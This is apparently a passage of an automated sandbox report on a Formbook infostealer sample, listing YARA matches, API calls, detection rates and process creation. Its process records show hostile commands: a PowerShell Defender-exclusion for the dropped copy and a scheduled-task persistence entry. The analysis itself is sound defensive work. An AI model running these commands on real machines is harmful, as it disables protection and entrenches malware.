          Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: iuvRyl9i7D.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_0096BA77
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_01344139
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_01344148
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_0134EDF0
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_0134EDE0
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_0134DA1C
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_075D4713
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_075D85C0
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_075D0040
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_075D7970
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_075D18D8
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_075D0006
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_07841398
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_0784B848
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_07840F61
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_07840F70
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_07842580
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 0_2_0784256F
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 8_2_002FBA77
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00401030
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0040927B
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00409280
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0040DC20
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00402D8F
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00402D90
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041D78F
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_00402FB0
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041E7BB
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0059BA77
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AD466
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045F841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B1D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B2D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045E0D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B25DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04612581
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04606E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046AD616
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B2EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B1FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046BDFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046BE824
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A830
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B28EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046120A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B20A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045FB090
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04604120
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_045EF900
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046099BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0469FA2B
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B22AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046B2B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0460A309
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046A03DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046ADBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461ABD8
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0461EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0060927B
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00609280
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0060DC20
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00602D8F
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00602D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_00602FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061E7BB
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 045EB150 appears 87 times
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041A310 NtCreateFile,
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041A3C0 NtReadFile,
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041A440 NtClose,
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041A4F0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeCode function: 12_2_0041A30C NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629610 NtEnumerateValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0462AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0462A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0462A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0462B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_046299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_04629B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0462A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061A310 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061A3C0 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061A440 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061A4F0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 21_2_0061A30C NtCreateFile,
          Source: iuvRyl9i7D.exeBinary or memory string: OriginalFilename vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 00000000.00000002.301765758.00000000075A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFort.dll" vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 00000000.00000002.294702301.0000000000962000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFort.dll" vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 00000000.00000002.301821423.0000000007770000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exeBinary or memory string: OriginalFilename vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 00000008.00000000.287142892.00000000002F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exeBinary or memory string: OriginalFilename vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 0000000C.00000000.292903741.0000000000592000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 0000000C.00000002.369531505.0000000002EC5000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 0000000C.00000002.369137494.00000000012DF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 0000000C.00000003.296040440.0000000000FB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exe, 0000000C.00000003.293928699.0000000000E0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exeBinary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
          Source: iuvRyl9i7D.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: dDqpEdJEtzi.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: iuvRyl9i7D.exeVirustotal: Detection: 23%
          Source: iuvRyl9i7D.exeReversingLabs: Detection: 19%
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeFile read: C:\Users\user\Desktop\iuvRyl9i7D.exeJump to behavior
          Source: iuvRyl9i7D.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\iuvRyl9i7D.exe "C:\Users\user\Desktop\iuvRyl9i7D.exe"
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
          Source: C:\Users\user\Desktop\iuvRyl9i7D.exeProcess created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
